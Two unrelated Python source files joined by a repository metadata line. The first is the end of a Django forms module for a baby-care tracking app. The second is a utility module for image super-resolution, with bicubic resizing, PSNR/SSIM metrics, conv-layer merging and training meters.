            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate child, most-recent feeding type, and duration/timer."""
        kwargs = set_default_feeding_type(set_default_child(kwargs))
        self.timer_id = kwargs.get('timer', None)
        super().__init__(*args, **set_default_duration(kwargs))

    def save(self, commit=True):
        """Save the feeding; if a timer drove it, stop that timer at `end`."""
        feeding = super().save(commit=False)
        if self.timer_id:
            models.Timer.objects.get(id=self.timer_id).stop(feeding.end)
        if commit:
            feeding.save()
        return feeding
class NoteQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for a Note; child choices are limited to the
    requesting user's accounts."""

    class Meta:
        model = models.Note
        fields = ['child', 'note']

    def __init__(self, *args, **kwargs):
        request_user = kwargs.pop('user')
        super().__init__(*args, **kwargs)
        self.fields['child'].queryset = user_children_queryset(request_user)
class NoteForm(forms.ModelForm):
    """Add/edit form for a Note tied to a (hidden) child."""

    class Meta:
        model = models.Note
        # BUG FIX: was ['note', 'note'] — the duplicated entry meant the
        # 'child' field, which the hidden widget below and set_default_child
        # in __init__ both expect, was never rendered or validated.
        fields = ['note', 'child']
        widgets = {
            'child': forms.HiddenInput()
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate the child from a 'child' kwarg when adding."""
        kwargs = set_default_child(kwargs)
        super(NoteForm, self).__init__(*args, **kwargs)
class NotificationForm(forms.ModelForm):
    """Add/edit form for a scheduled Notification.

    Account/child choices are restricted to what the view passes in; once a
    notification has sent at least one event, every field except 'active' is
    rendered read-only so delivery history cannot be rewritten.
    """
    class Meta:
        model = models.Notification
        fields = [
            'title',
            'body',
            'frequency_hours',
            'intervals',
            'active',
            'start',
            'end',
            'account',
            'child',
        ]
        widgets = {
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
            'body': forms.Textarea(attrs={'rows': 4, 'cols': 10})
        }
    def __init__(self, *args, **kwargs):
        # The view supplies the allowed accounts and (optionally) children.
        accounts = kwargs.pop('accounts')
        children = kwargs.pop('children')
        instance = kwargs.get('instance')
        super(NotificationForm, self).__init__(*args, **kwargs)
        self.fields['account'].queryset = accounts
        if not children:
            # Fall back to every child reachable through the allowed accounts.
            children = models.Child.objects.filter(account__in=accounts)
        self.fields['child'].queryset = children
        set_common_select_fields_empty_values(self)
        now = timezone.now()
        if instance and instance.start < now:
            has_sent_events = instance.notification_events.filter(sent=True).count() > 0
            if has_sent_events:
                # Lock everything but the on/off switch once delivery started.
                for field in self.fields:
                    if field != 'active':
                        self.fields[field].widget.attrs['readonly'] = True
class SleepQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for Sleep, optionally pre-filled from a timer."""

    class Meta:
        model = models.Sleep
        fields = ['child', 'start', 'end']
        widgets = {
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
        }

    def __init__(self, *args, **kwargs):
        request_user = kwargs.pop('user')
        self.timer_id = kwargs.get('timer', None)
        super().__init__(*args, **set_default_duration(kwargs))
        self.fields['child'].queryset = user_children_queryset(request_user)

    def save(self, commit=True):
        """Save the sleep entry, stopping the driving timer (if any) at `end`.

        NOTE(review): the instance is saved regardless of `commit`, matching
        the original behavior (unlike FeedingForm.save) — confirm intended.
        """
        sleep = super().save(commit=False)
        if self.timer_id:
            models.Timer.objects.get(id=self.timer_id).stop(sleep.end)
        sleep.save()
        return sleep
class SleepForm(forms.ModelForm):
    """Add/edit form for Sleep; hidden child, optionally driven by a timer."""

    class Meta:
        model = models.Sleep
        fields = ['start', 'end', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
        }

    def __init__(self, *args, **kwargs):
        kwargs = set_default_child(kwargs)
        self.timer_id = kwargs.get('timer', None)
        super().__init__(*args, **set_default_duration(kwargs))

    def save(self, commit=True):
        """Save the sleep entry, stopping the driving timer (if any) at `end`."""
        sleep = super().save(commit=False)
        if self.timer_id:
            models.Timer.objects.get(id=self.timer_id).stop(sleep.end)
        sleep.save()
        return sleep
class TemperatureQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for a Temperature reading."""

    class Meta:
        model = models.Temperature
        fields = ['child', 'temperature', 'time']
        widgets = {
            'time': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_time',
            }),
        }

    def __init__(self, *args, **kwargs):
        request_user = kwargs.pop('user')
        super().__init__(*args, **kwargs)
        self.fields['child'].queryset = user_children_queryset(request_user)
class TemperatureForm(forms.ModelForm):
    """Add/edit form for a Temperature reading; hidden child field."""

    class Meta:
        model = models.Temperature
        fields = ['temperature', 'time', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'time': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_time',
            }),
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate the child from a 'child' kwarg when adding."""
        super().__init__(*args, **set_default_child(kwargs))
class TimerQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for a Timer; the creating user is recorded on save."""

    class Meta:
        model = models.Timer
        fields = ['user', 'account', 'child', 'is_feeding', 'is_sleeping', 'is_tummytime', 'name', 'start']
        widgets = {
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            })
        }

    def __init__(self, *args, **kwargs):
        # BUG FIX: save() reads self.user, but the popped 'user' kwarg was only
        # bound to a local variable, so every save raised AttributeError.
        self.user = kwargs.pop('user')
        super(TimerQuickAddForm, self).__init__(*args, **kwargs)
        self.fields['child'].queryset = user_children_queryset(self.user)
        self.fields['account'].queryset = self.user.accounts.all()

    def save(self, commit=True):
        """Save the timer, stamping it with the requesting user."""
        instance = super(TimerQuickAddForm, self).save(commit=False)
        instance.user = self.user
        instance.save()
        return instance
class TimerForm(forms.ModelForm):
    """Edit form for a Timer's name and start time."""

    class Meta:
        model = models.Timer
        fields = ['name', 'start']
        widgets = {
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            })
        }

    def __init__(self, *args, **kwargs):
        # BUG FIX: save() read self.user, but it was never assigned anywhere,
        # so every save raised AttributeError. Accept an optional 'user' kwarg
        # (keeping old call sites working) and remember it.
        self.user = kwargs.pop('user', None)
        super(TimerForm, self).__init__(*args, **kwargs)

    def save(self, commit=True):
        """Save the timer, re-stamping the user only when one was supplied."""
        instance = super(TimerForm, self).save(commit=False)
        if self.user is not None:
            instance.user = self.user
        instance.save()
        return instance
class TummyTimeQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for TummyTime, optionally pre-filled from a timer."""

    class Meta:
        model = models.TummyTime
        fields = ['child', 'start', 'end', 'milestone']
        widgets = {
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
        }

    def __init__(self, *args, **kwargs):
        request_user = kwargs.pop('user')
        self.timer_id = kwargs.get('timer', None)
        super().__init__(*args, **set_default_duration(kwargs))
        self.fields['child'].queryset = user_children_queryset(request_user)

    def save(self, commit=True):
        """Save the entry, stopping the driving timer (if any) at `end`."""
        tummy_time = super().save(commit=False)
        if self.timer_id:
            models.Timer.objects.get(id=self.timer_id).stop(tummy_time.end)
        tummy_time.save()
        return tummy_time
class TummyTimeForm(forms.ModelForm):
    """Add/edit form for TummyTime; hidden child, optionally driven by a timer."""

    class Meta:
        model = models.TummyTime
        fields = ['start', 'end', 'milestone', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'start': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_start',
            }),
            'end': forms.DateTimeInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_end',
            }),
        }

    def __init__(self, *args, **kwargs):
        kwargs = set_default_child(kwargs)
        self.timer_id = kwargs.get('timer', None)
        super().__init__(*args, **set_default_duration(kwargs))

    def save(self, commit=True):
        """Save the entry, stopping the driving timer (if any) at `end`."""
        tummy_time = super().save(commit=False)
        if self.timer_id:
            models.Timer.objects.get(id=self.timer_id).stop(tummy_time.end)
        tummy_time.save()
        return tummy_time
class WeightQuickAddForm(forms.ModelForm):
    """Dashboard quick-add form for a Weight measurement."""

    class Meta:
        model = models.Weight
        fields = ['child', 'weight', 'date']
        widgets = {
            'date': forms.DateInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_date',
            }),
        }

    def __init__(self, *args, **kwargs):
        request_user = kwargs.pop('user')
        super().__init__(*args, **kwargs)
        self.fields['child'].queryset = user_children_queryset(request_user)
class WeightForm(forms.ModelForm):
    """Add/edit form for a Weight measurement; hidden child field."""

    class Meta:
        model = models.Weight
        fields = ['weight', 'date', 'child']
        widgets = {
            'child': forms.HiddenInput(),
            'date': forms.DateInput(attrs={
                'class': 'datetimepicker-input',
                'data-target': '#datetimepicker_date',
            }),
        }

    def __init__(self, *args, **kwargs):
        """Pre-populate the child from a 'child' kwarg when adding."""
        super().__init__(*args, **set_default_child(kwargs))
| amcquistan/babyasst | core/forms.py | forms.py | py | 15,304 | python | en | code | 0 | github-code | 50 |
23078030353 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@文件 :CommonUtils.py
@说明 :
@时间 :2021/05/29 15:47:14
@作者 :Oasis
@版本 :1.0
'''
import os
import time
import sys
import h5py
import numpy as np
import skimage.io as io
import torch
import torch.nn as nn
import math
import torch.nn.functional as F
import torch.distributed as dist
import shutil
from pytorch_msssim import ssim, ms_ssim, SSIM, MS_SSIM
from torch.utils.data import DataLoader
from Utils.buildDataset import DIV2KCropTrainDataset, DIV2KCropValidDataset
from torch.utils.data.distributed import DistributedSampler
from imageUtils.ImageUtils import *
from models.maskunit import MaskUnit
from torch.optim.lr_scheduler import _LRScheduler
from torch.optim.lr_scheduler import ReduceLROnPlateau
def collapse_Skip(weight_tmp, new_bias, f3, f3b):
    """Collapse a convolution followed by a 1x1 convolution into one conv.

    Args:
        weight_tmp: weight of the first conv, shape (O1, I, k, k).
        new_bias: bias of the first conv, shape (O1,), or None.
        f3: weight of the following 1x1 conv, shape (O2, O1, 1, 1).
        f3b: bias of the following conv, shape (O2,), or None.

    Returns:
        (merged_weight, merged_bias): parameters of the single equivalent conv,
        shape (O2, I, k, k) and (O2,) (bias may be None).

    BUG FIX: the merged-weight buffer was allocated with .to('cuda'), which
    crashed on CPU-only hosts; it now follows weight_tmp's device and dtype.
    """
    weight3 = f3
    bias3 = f3b
    # Flatten spatial dims: each (out, in) channel pair becomes a row vector.
    weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
    weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
    new_weight_ = torch.empty(
        weight3.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3),
        device=weight_tmp.device, dtype=weight_tmp.dtype)
    # Per input channel: mix the first conv's output channels by the 1x1 weights.
    for i in range(weight_tmp.size(1)):
        new_weight_[:, i, :] = torch.matmul(weight3_, weight_tmp_[:, i, :])
    weight_collapse = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
    # Bias folding: b' = W3 @ b1 + b3, degrading gracefully when either is None.
    if new_bias is not None and bias3 is not None:
        bias_collapse = torch.matmul(weight3_, new_bias) + bias3  # with bias
    elif new_bias is None:
        bias_collapse = bias3  # without bias on the first conv
    else:
        bias_collapse = None
    return weight_collapse, bias_collapse
# matlab 'imresize' function, now only support 'bicubic'
def cubic(x):
    """Bicubic interpolation kernel (Keys, a = -0.5), evaluated elementwise."""
    a = torch.abs(x)
    a2 = a * a
    a3 = a2 * a
    inner = (1.5 * a3 - 2.5 * a2 + 1) * ((a <= 1).type_as(a))
    outer = (-0.5 * a3 + 2.5 * a2 - 4 * a + 2) * (((a > 1) * (a <= 2)).type_as(a))
    return inner + outer
def calculate_weights_indices(in_length, out_length, scale, kernel, kernel_width, antialiasing):
    """Precompute, for each output pixel, the input indices and bicubic
    weights used to resample a length-`in_length` axis to `out_length`.

    Returns (weights, indices, sym_len_s, sym_len_e), where sym_len_s/e are
    how many symmetrically-mirrored border pixels the caller must pad at the
    start/end so all indices are valid.
    NOTE(review): `kernel` is accepted but unused — only bicubic is supported.
    """
    if (scale < 1) and (antialiasing):
        # Use a modified kernel to simultaneously interpolate and antialias- larger kernel width
        kernel_width = kernel_width / scale
    # Output-space coordinates
    x = torch.linspace(1, out_length, out_length)
    # Input-space coordinates. Calculate the inverse mapping such that 0.5
    # in output space maps to 0.5 in input space, and 0.5+scale in output
    # space maps to 1.5 in input space.
    u = x / scale + 0.5 * (1 - 1 / scale)
    # What is the left-most pixel that can be involved in the computation?
    left = torch.floor(u - kernel_width / 2)
    # What is the maximum number of pixels that can be involved in the
    # computation?  Note: it's OK to use an extra pixel here; if the
    # corresponding weights are all zero, it will be eliminated at the end
    # of this function.
    P = math.ceil(kernel_width) + 2
    # The indices of the input pixels involved in computing the k-th output
    # pixel are in row k of the indices matrix.
    indices = left.view(out_length, 1).expand(out_length, P) + torch.linspace(0, P - 1, P).view(
        1, P).expand(out_length, P)
    # The weights used to compute the k-th output pixel are in row k of the
    # weights matrix.
    distance_to_center = u.view(out_length, 1).expand(out_length, P) - indices
    # apply cubic kernel
    if (scale < 1) and (antialiasing):
        weights = scale * cubic(distance_to_center * scale)
    else:
        weights = cubic(distance_to_center)
    # Normalize the weights matrix so that each row sums to 1.
    weights_sum = torch.sum(weights, 1).view(out_length, 1)
    weights = weights / weights_sum.expand(out_length, P)
    # If a column in weights is all zero, get rid of it. only consider the first and last column.
    weights_zero_tmp = torch.sum((weights == 0), 0)
    if not math.isclose(weights_zero_tmp[0], 0, rel_tol=1e-6):
        indices = indices.narrow(1, 1, P - 2)
        weights = weights.narrow(1, 1, P - 2)
    if not math.isclose(weights_zero_tmp[-1], 0, rel_tol=1e-6):
        indices = indices.narrow(1, 0, P - 2)
        weights = weights.narrow(1, 0, P - 2)
    weights = weights.contiguous()
    indices = indices.contiguous()
    # Shift indices into the padded coordinate frame the caller constructs.
    sym_len_s = -indices.min() + 1
    sym_len_e = indices.max() - in_length
    indices = indices + sym_len_s - 1
    return weights, indices, int(sym_len_s), int(sym_len_e)
# --------------------------------------------
# imresize for numpy image [0, 1]
# --------------------------------------------
def imresize_np(img, scale, antialiasing=True):
    """MATLAB-compatible bicubic resize of a numpy image in [0, 1].

    Resampling is separable: first along H, then along W, each time with
    symmetric border padding derived from calculate_weights_indices().
    """
    # Now the scale should be the same for H and W
    # input: img: Numpy, HWC or HW [0,1]
    # output: HWC or HW [0,1] w/o round
    img = torch.from_numpy(img)
    need_squeeze = True if img.dim() == 2 else False
    if need_squeeze:
        # Treat a grayscale HW image as HWC with one channel.
        img.unsqueeze_(2)
    in_H, in_W, in_C = img.size()
    out_C, out_H, out_W = in_C, math.ceil(in_H * scale), math.ceil(in_W * scale)
    kernel_width = 4
    kernel = 'cubic'
    # Return the desired dimension order for performing the resize.  The
    # strategy is to perform the resize first along the dimension with the
    # smallest scale factor.
    # Now we do not support this.
    # get weights and indices
    weights_H, indices_H, sym_len_Hs, sym_len_He = calculate_weights_indices(
        in_H, out_H, scale, kernel, kernel_width, antialiasing)
    weights_W, indices_W, sym_len_Ws, sym_len_We = calculate_weights_indices(
        in_W, out_W, scale, kernel, kernel_width, antialiasing)
    # process H dimension
    # symmetric copying
    img_aug = torch.FloatTensor(in_H + sym_len_Hs + sym_len_He, in_W, in_C)
    img_aug.narrow(0, sym_len_Hs, in_H).copy_(img)
    sym_patch = img[:sym_len_Hs, :, :]
    inv_idx = torch.arange(sym_patch.size(0) - 1, -1, -1).long()
    sym_patch_inv = sym_patch.index_select(0, inv_idx)
    img_aug.narrow(0, 0, sym_len_Hs).copy_(sym_patch_inv)
    sym_patch = img[-sym_len_He:, :, :]
    inv_idx = torch.arange(sym_patch.size(0) - 1, -1, -1).long()
    sym_patch_inv = sym_patch.index_select(0, inv_idx)
    img_aug.narrow(0, sym_len_Hs + in_H, sym_len_He).copy_(sym_patch_inv)
    out_1 = torch.FloatTensor(out_H, in_W, in_C)
    kernel_width = weights_H.size(1)
    for i in range(out_H):
        idx = int(indices_H[i][0])
        for j in range(out_C):
            # Weighted sum of the contributing input rows for output row i.
            out_1[i, :, j] = img_aug[idx:idx + kernel_width, :, j].transpose(0, 1).mv(weights_H[i])
    # process W dimension
    # symmetric copying
    out_1_aug = torch.FloatTensor(out_H, in_W + sym_len_Ws + sym_len_We, in_C)
    out_1_aug.narrow(1, sym_len_Ws, in_W).copy_(out_1)
    sym_patch = out_1[:, :sym_len_Ws, :]
    inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
    sym_patch_inv = sym_patch.index_select(1, inv_idx)
    out_1_aug.narrow(1, 0, sym_len_Ws).copy_(sym_patch_inv)
    sym_patch = out_1[:, -sym_len_We:, :]
    inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
    sym_patch_inv = sym_patch.index_select(1, inv_idx)
    out_1_aug.narrow(1, sym_len_Ws + in_W, sym_len_We).copy_(sym_patch_inv)
    out_2 = torch.FloatTensor(out_H, out_W, in_C)
    kernel_width = weights_W.size(1)
    for i in range(out_W):
        idx = int(indices_W[i][0])
        for j in range(out_C):
            # Weighted sum of the contributing columns for output column i.
            out_2[:, i, j] = out_1_aug[:, idx:idx + kernel_width, j].mv(weights_W[i])
    if need_squeeze:
        out_2.squeeze_()
    return out_2.numpy()
def compute_ck(s_1, s_2):
    """
    Compute weight from 2 conv layers, whose kernel size larger than 3*3
    After derivation, F.conv_transpose2d can be used to compute weight of original conv layer
    :param s_1: 3*3 or larger conv layer (nn.Conv2d or {'weight','bias'} dict)
    :param s_2: 3*3 or larger conv layer (nn.Conv2d or {'weight','bias'} dict)
    :return: dict with the merged 'weight' and 'bias'
    """
    def _params(layer):
        # Accept either an nn.Conv2d module or a raw weight/bias dict.
        if isinstance(layer, nn.Conv2d):
            return layer.weight, layer.bias
        return layer['weight'], layer['bias']

    w1, b1 = _params(s_1)
    w2, b2 = _params(s_2)
    # Composing two convs is a transposed convolution of the second weight by the first.
    new_weight = F.conv_transpose2d(w2, w1)
    # Bias folding: each output channel of the second conv accumulates the
    # first conv's bias through the sum of its kernel taps.
    if b1 is not None and b2 is not None:
        kernel_sums = torch.sum(w2.view(w2.size(0), w2.size(1), -1), dim=2)
        new_bias = torch.matmul(kernel_sums, b1) + b2
    elif b1 is None:
        new_bias = b2  # without bias on the first conv
    else:
        new_bias = None
    return {'weight': new_weight, 'bias': new_bias}
def expandDataset(hr_path_base, lr_path_base, valid_hr_path, valid_lr_path, cnt, size, scale, type_ori, dataset, logger, rank, base_path, ablation=False):
    """Build an HDF5 test database of Y-channel HR/LR image pairs for a benchmark.

    Reads every PNG under hr_path_base, pairs it with '<name>x<scale>.png'
    under lr_path_base, converts both to the Y channel and writes them to
    <base_path>/benchmark/hdf5/<dataset>/X<scale>/test_database.hdf5 under
    the 'hr' and 'lr' groups (one dataset per image, keyed by index).

    NOTE(review): valid_hr_path, valid_lr_path, cnt, size, type_ori and
    ablation are accepted but never used here — confirm before removing.
    Only rank 0 logs; all ranks write the file.
    """
    if rank == 0:
        logger.logger.info('make test dataset **{}**'.format(dataset))
    outdir = os.path.join(base_path, 'benchmark', 'hdf5', dataset, 'X{}'.format(scale))
    outpath = os.path.join(outdir, 'test_database.hdf5')
    if not os.path.exists(outdir):
        os.makedirs(outdir)
    h5_file = h5py.File(outpath, 'w')
    lr_groups = h5_file.create_group('lr')
    hr_groups = h5_file.create_group('hr')
    for i,img_path in enumerate(os.listdir(hr_path_base)):
        if img_path.endswith(".png"):
            if rank == 0:
                logger.logger.info('process -> {}'.format(img_path))
            hr_path = os.path.join(hr_path_base, img_path)
            # LR file naming convention: '<stem>x<scale>.png'.
            lr_path = os.path.join(lr_path_base, '{}x{}.png'.format(img_path.split('.')[0], scale))
            hr = io.imread(hr_path)
            lr = io.imread(lr_path)
            # Keep only the luminance (Y) channel.
            hr = imgRgb2Y(hr)
            lr = imgRgb2Y(lr)
            lr_groups.create_dataset(str(i), data=lr)
            hr_groups.create_dataset(str(i), data=hr)
    h5_file.close()
def preprocess(path, build_type, args, test=False):
    """Build the DataLoader (and optional DistributedSampler) for a split.

    Args:
        path: dataset path handed to the Dataset constructor.
        build_type: 'train', 'valid', or anything else (treated as test).
        args: namespace providing batch_size and num_works.
        test: when True, skip the distributed sampler even on multi-GPU hosts.

    Returns:
        (data_loader, sampler) — sampler is None except for distributed training.

    PERF/BUG FIX: the training branch constructed DIV2KCropTrainDataset(path)
    twice — once for the sampler and once for the loader — so the sampler was
    wired to a different dataset object than the one actually loaded; the
    dataset is now built exactly once and shared.
    """
    if build_type == 'train':
        train_dataset = DIV2KCropTrainDataset(path)
        train_sampler = None
        if torch.cuda.device_count() > 1 and not test:
            # multi-GPUs: shard the dataset across processes.
            train_sampler = DistributedSampler(train_dataset, shuffle=True)
            data_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False,
                                     pin_memory=True, sampler=train_sampler, num_workers=args.num_works)
        else:
            # default single-process loader
            data_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False,
                                     pin_memory=True, num_workers=args.num_works)
        return data_loader, train_sampler
    elif build_type == 'valid':
        data_loader = DataLoader(DIV2KCropValidDataset(path), batch_size=1, shuffle=False, pin_memory=True)
        return data_loader, None
    else:
        # Any other build_type is treated as the test split.
        data_loader = DataLoader(DIV2KCropValidDataset(path), batch_size=1, shuffle=False, pin_memory=True)
        return data_loader, None
def computer_psnr(pre_y, label_y, scale, data_range=1.):
    """Crop a `scale`-pixel border, align the two maps to a common size, and
    delegate to calc_psnr."""
    pre_y = pre_y[:, :, scale:-scale, scale:-scale]
    label_y = label_y[:, :, scale:-scale, scale:-scale]
    common_h = min(pre_y.shape[2], label_y.shape[2])
    common_w = min(pre_y.shape[3], label_y.shape[3])
    return calc_psnr(pre_y[:, :, :common_h, :common_w],
                     label_y[:, :, :common_h, :common_w], data_range)
def calc_psnr(sr, hr, data_range):
    """Peak signal-to-noise ratio of `sr` against `hr`, in dB."""
    mse = ((sr - hr) / data_range).pow(2).mean()
    return -10 * torch.log10(mse)
def calc_ssim(sr, hr, data_range):
    """Structural similarity of `sr` against `hr`, cropped to a common size.

    Delegates to pytorch_msssim.ssim; data_range is passed positionally and
    size_average=True reduces to a scalar.
    """
    common_h = min(sr.shape[2], hr.shape[2])
    common_w = min(sr.shape[3], hr.shape[3])
    sr = sr[:, :, :common_h, :common_w]
    hr = hr[:, :, :common_h, :common_w]
    return ssim(sr, hr, data_range, size_average=True)
def clip_by_tensor(t, t_min, t_max):
    """
    clip_by_tensor
    :param t: tensor
    :param t_min: min
    :param t_max: max
    :return: cliped tensor

    Clamps elementwise into [t_min, t_max] using float masks.
    """
    t = t.float()
    floored = (t >= t_min).float() * t + (t < t_min).float() * t_min
    return (floored <= t_max).float() * floored + (floored > t_max).float() * t_max
def collapse_block(layer, collapse_weight, collapse_bias, nameIn='', residual=False, mode='collapse'):
    """Merge the two conv children of `layer` into one kernel and stash the
    result in the shared collapse_weight / collapse_bias dicts.

    Keys written: '<nameIn>_weight_comb', '<nameIn>_bias_comb' (mode
    'collapse' only) and '<nameIn>_prelu' for any PReLU child.
    When `residual` is set (non-'collapse' mode), an identity kernel is added
    so the merged conv also carries the skip connection.
    NOTE(review): assumes exactly two conv children (plus optional PReLU);
    the loop variable shadows the `layer` argument — confirm intended.
    """
    out_dict = {}
    cnt = 0
    for name, layer in layer.named_children():
        if isinstance(layer, nn.PReLU):
            # PReLU slope is kept verbatim, not merged.
            collapse_weight[nameIn+'_'+'prelu'] = layer.weight.data
            continue
        weight1 = layer.weight.data
        bias1 = layer.bias
        out_dict['weight'+str(cnt)] = weight1
        out_dict['bias'+str(cnt)] = bias1
        cnt += 1
    if mode == 'collapse':
        # compute_ck()
        weight1 = out_dict["weight"+str(0)]
        bias1 = out_dict["bias"+str(0)]
        weight2 = out_dict["weight"+str(1)]
        bias2 = out_dict["bias"+str(1)]
        # weight3 = out_dict["weight"+str(2)]
        # bias3 = out_dict["bias"+str(2)]
        weight, bias = collapse_Skip(weight1,bias1,weight2,bias2)
        # weight, bias = collapse_CollapseLayer(weight1,bias1,weight2,bias2,weight3,bias3)
        collapse_weight[nameIn+'_weight_comb'] = weight
        collapse_bias[nameIn+'_bias_comb'] = bias
    else:
        weight1 = out_dict["weight"+str(0)]
        bias1 = out_dict["bias"+str(0)]
        weight2 = out_dict["weight"+str(1)]
        bias2 = out_dict["bias"+str(1)]
        # weight merge
        weight_combi, bias = collapse_Skip(weight1,bias1,weight2,bias2)
        if residual:
            # residual merge: build an identity kernel centered in the window.
            outDims, kernel_size = weight_combi.shape[0],weight_combi.shape[3]
            weight_residual = torch.zeros(weight_combi.shape).cuda()
            if kernel_size == 3:
                idx = 1
            if kernel_size == 5:
                idx = 2
            for i in range(outDims):
                weight_residual[i,i,idx,idx] = 1
            # residual combi
            weight_collapse = weight_residual + weight_combi
        else:
            weight_collapse = weight_combi
        collapse_weight[nameIn+'_weight_comb'] = weight_collapse
def collapse_imply(layer, collapse_weight, collapse_bias, nameIn='', skip=False):
    """Write the previously collapsed weights/biases back into `layer`'s children.

    Counterpart of collapse_block(): bias-less convs and PReLUs get their
    '<nameIn>_*' entries, MaskUnit children get '<nameIn>_mask_*', any other
    conv gets the combined weight (and bias, when one was stored).
    NOTE(review): the `skip` parameter is accepted but unused, and the loop
    variable shadows the `layer` argument — confirm intended.
    """
    for name, layer in layer.named_children():
        if isinstance(layer, nn.Conv2d) and layer.bias is None:
            layer.weight.data = collapse_weight[nameIn+'_weight_comb']
            continue
        elif isinstance(layer, nn.PReLU):
            layer.weight.data = collapse_weight[nameIn+'_prelu']
            continue
        elif isinstance(layer, MaskUnit):
            # Descend one level: the MaskUnit's internal conv keeps its own keys.
            for name, layer in layer.named_children():
                if isinstance(layer, nn.Conv2d):
                    layer.weight.data = collapse_weight[nameIn+'_mask_weight']
                    layer.bias.data = collapse_bias[nameIn+'_mask_bias']
                    continue
        else:
            if isinstance(layer, nn.Conv2d):
                layer.weight.data = collapse_weight[nameIn+'_weight_comb']
                if collapse_bias[nameIn+'_bias_comb'] is not None:
                    layer.bias.data = collapse_bias[nameIn+'_bias_comb']
def space_to_depth(in_tensor, down_scale):
    """Rearrange non-overlapping down_scale x down_scale patches into channels:
    (N, C, H, W) -> (N, C*s*s, H/s, W/s)."""
    batch, channels, height, width = in_tensor.size()
    patches = torch.nn.functional.unfold(in_tensor, down_scale, stride=down_scale)
    return patches.view(batch, channels * down_scale ** 2,
                        height // down_scale, width // down_scale)
def getMask_simple(x, scale, training):
    """Mark "hard" pixels: those whose bicubic down/up-sampling error exceeds
    the per-image median error.

    Returns an (n, 1, h, w) boolean mask. The ``training`` flag is accepted
    for interface compatibility but not used here.
    """
    n, c, h, w = x.shape
    # Round-trip through a low-resolution version of the input.
    low = F.interpolate(x, (h // scale, w // scale), mode='bicubic', align_corners=False)
    rec = F.interpolate(low, (h, w), mode='bicubic', align_corners=False)
    # Per-pixel reconstruction error, averaged over channels.
    err = torch.abs(x - rec).view(n, c, -1)
    err = torch.mean(err, 1, keepdim=True)
    threshold = torch.median(err, dim=2, keepdim=True)[0]
    return (err > threshold).view(n, 1, h, w)
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
    """Serialize *state* to *filename*; when *is_best*, also mirror it to
    'model_best.pth.tar' in the working directory."""
    torch.save(state, filename)
    if not is_best:
        return
    shutil.copyfile(filename, 'model_best.pth.tar')
class AverageMeter(object):
    """Tracks the most recent value and the running average of a metric."""

    def __init__(self, name, fmt=':f'):
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Clear all accumulated statistics."""
        self.val, self.avg, self.sum, self.count = 0, 0, 0, 0

    def update(self, val, n=1):
        """Record *val* observed *n* times and refresh the running mean."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count

    def __str__(self):
        # e.g. with fmt=':.2f' -> 'loss 0.12 (0.34)'
        template = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Formats a per-batch progress line '[  b/total]' followed by the string
    form of every attached AverageMeter, and prints it tab-separated."""

    def __init__(self, num_batches, meters, prefix=""):
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print the progress line for *batch*."""
        entries = [self.prefix + self.batch_fmtstr.format(batch)]
        entries += [str(meter) for meter in self.meters]
        print('\t'.join(entries))

    def _get_batch_fmtstr(self, num_batches):
        """Build a '[{:Nd}/total]' template where N is the digit count of the
        total, so the counter column stays aligned."""
        num_digits = len(str(num_batches))  # fixed: 'num_batches // 1' was a no-op
